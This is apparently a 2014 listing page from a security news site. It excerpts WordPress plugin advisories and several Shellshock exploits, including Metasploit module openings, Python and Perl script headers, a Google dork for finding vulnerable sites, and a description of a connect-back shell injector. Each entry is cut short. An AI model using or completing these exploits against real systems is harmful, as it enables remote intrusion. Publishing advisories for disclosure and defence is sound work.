WordPress Photo Gallery Cross-Site Scripting (XSS)

October 1, 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23232
Product: Photo Gallery WordPress plugin
Vendor: http://web-dorado.com/
Vulnerable Version(s): 1.1.30 and probably prior
Tested Version: 1.1.30
Advisory Publication:  September 10, 2014  [without technical details]
Vendor Notification: September 10, 2014 
Vendor Patch: September 10, 2014 
Public Disclosure: October 1, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-6315
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...


WordPress All In One WP Security 3.8.2 SQL Injection

September 30, 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy 
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication:  September 3, 2014  [without technical details]
Vendor Notification: September 3, 2014 
Vendor Patch: September 12, 2014 
Public Disclosure: September 24, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...


WordPress Users Ultra 1.3.37 SQL Injection

September 30, 2014 - Source: http://www.mondounix.com
#################################################################################################
# Title                : Wordpress Users Ultra Plugin - SQL injection Vulnerability
# Risk                 : High+/Critical
# Author               : XroGuE
# Google Dork          : inurl: wp-content/plugins/users-ultra/
# Plugin Version       : 1.3.37
# Plugin Name          : users ultra
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip
# Vendor Home          : http://www.usersultra.com/
# Date                 : 2014/09/27
# Tested in            : Win7 - Linux
##################################################################################################
# Description: 
# This Vulnerability Available...


WordPress All In One Security And Firewall 3.8.3 XSS

September 30, 2014 - Source: http://www.mondounix.com
Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
 
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
 
 
Release Date:
=============
2014-09-29
 
 
Vulnerability Laboratory ID (VL-ID):
====================================
1327
 
 
Common Vulnerability Scoring System:
====================================
3.3
 
 
Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a 
security plugin that enforces a lot of good security practices. The All In One...


IPFire 2.15 Bash Command Injection

September 30, 2014 - Source: http://www.mondounix.com
#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
#       It can be maintained via a web interface.
#       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
#       IPFire is based on Linux From Scratch and is, like the Endian Firewall,...


DHCP Client Bash Environment Variable Code Injection

September 29, 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/proto/dhcp'
 
class Metasploit3 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::DHCPServer
 
  def initialize
    super(
      'Name'        => 'DHCP Client Bash Environment Variable Code Injection',
      'Description'    => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting dhclient network configuration
        scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
      },
      'Author'      =>
        [
          'scriptjunkie',...


Apache mod_cgi Bash Environment Variable Code Injection

September 29, 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane...


Gnu Bash 4.3 CGI Scan Remote Command Injection

September 29, 2014 - Source: http://www.mondounix.com
#!/usr/bin/env python
 
# http connection
import urllib2
# Args management
import optparse
# Error management
import sys
 
banner = """
      _______                 _______             __
     |   _   .-----.--.--.   |   _   .---.-.-----|  |--.
     |.  |___|     |  |  |   |.  1   |  _  |__ --|     |
     |.  |   |__|__|_____|   |.  _   |___._|_____|__|__|
     |:  1   |               |:  1    \
     |::.. . |               |::.. .  /
     `-------'               `-------'
      ___ ___   _______     _______ _______ ___
     |   Y   | |   _   |   |   _   |   _   |   |
     |   |   |_|___|   |   |.  l   |.  1___|.  |
     |____   |___(__   |   |.  _   |.  |___|.  |
         |:  | |:  1   |   |:  | ...


bashedCgi Remote Command Execution

September 29, 2014 - Source: http://www.mondounix.com
    require 'msf/core'
 
    class Metasploit3 < Msf::Auxiliary
 
        include Msf::Exploit::Remote::HttpClient
 
 
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'bashedCgi',
                'Description'    => %q{
                   Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. 
                },
                'Author'         => [ 'Stephane Chazelas' ], # vuln discovery 
     'Author'   => [ 'Shaun Colley <scolley at ioactive.com>' ], # metasploit module 
                'License'        => MSF_LICENSE,
...


Gnu Bash 4.3 CGI REFERER Command Injection

September 26, 2014 - Source: http://www.mondounix.com
#!/usr/bin/perl
#
# Title: Bash/cgi command execution exploit
# CVE: CVE-2014-6271
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 25 September 2014
# Published: 26 September 2014
# MorXploit Research
# http://www.MorXploit.com
#
# Description:
# Perl code to exploit CVE-2014-6271.  
# Injects a Perl connect back shell. 
#
# Download:
# http://www.morxploit.com/morxploits/morxbash.pl
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Tested on:
# Apache 2.4.7 / Ubuntu 14.04.1 LTS / Bash 4.3.11(1)-release (x86_64-pc-linux-gnu)
#
#...
